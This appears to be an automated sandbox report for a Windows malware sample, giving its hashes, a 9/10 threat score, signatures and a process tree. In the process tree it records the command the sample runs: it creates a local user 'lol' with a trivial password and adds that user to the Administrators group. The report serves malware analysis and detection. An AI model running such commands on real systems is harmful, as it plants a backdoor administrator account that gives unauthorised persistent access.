Analysis
-
max time kernel
40s -
max time network
44s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
08-06-2022 04:21
Static task
static1
Behavioral task
behavioral1
Sample
1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe
Resource
win7-20220414-en
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe
Resource
win10v2004-20220414-en
windows10-2004_x64
0 signatures
0 seconds
General
-
Target
1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe
-
Size
72KB
-
MD5
1f299506e50a82c1111969d4bf76e7ea
-
SHA1
9758832ef27dc5b099417f505da7060dd9f7695e
-
SHA256
1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8
-
SHA512
a960f7751d479101ce4d64ac0bbdde1700c7cbeacdd9a6c6f15faaef959a582934cc6053ef2d4fab2c408581a3a477dab02c38d191682b9ca9f894058dd49673
Score
9/10
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.execmd.exenet.exenet.exedescription pid process target process PID 1672 wrote to memory of 1796 1672 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe cmd.exe PID 1672 wrote to memory of 1796 1672 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe cmd.exe PID 1672 wrote to memory of 1796 1672 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe cmd.exe PID 1672 wrote to memory of 1796 1672 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe cmd.exe PID 1796 wrote to memory of 912 1796 cmd.exe net.exe PID 1796 wrote to memory of 912 1796 cmd.exe net.exe PID 1796 wrote to memory of 912 1796 cmd.exe net.exe PID 1796 wrote to memory of 912 1796 cmd.exe net.exe PID 912 wrote to memory of 1484 912 net.exe net1.exe PID 912 wrote to memory of 1484 912 net.exe net1.exe PID 912 wrote to memory of 1484 912 net.exe net1.exe PID 912 wrote to memory of 1484 912 net.exe net1.exe PID 1796 wrote to memory of 1328 1796 cmd.exe net.exe PID 1796 wrote to memory of 1328 1796 cmd.exe net.exe PID 1796 wrote to memory of 1328 1796 cmd.exe net.exe PID 1796 wrote to memory of 1328 1796 cmd.exe net.exe PID 1328 wrote to memory of 1456 1328 net.exe net1.exe PID 1328 wrote to memory of 1456 1328 net.exe net1.exe PID 1328 wrote to memory of 1456 1328 net.exe net1.exe PID 1328 wrote to memory of 1456 1328 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe"C:\Users\Admin\AppData\Local\Temp\1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net user lol j /ADD && net localgroup Administrators lol /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet user lol j /ADD3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user lol j /ADD4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators lol /ADD3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators lol /ADD4⤵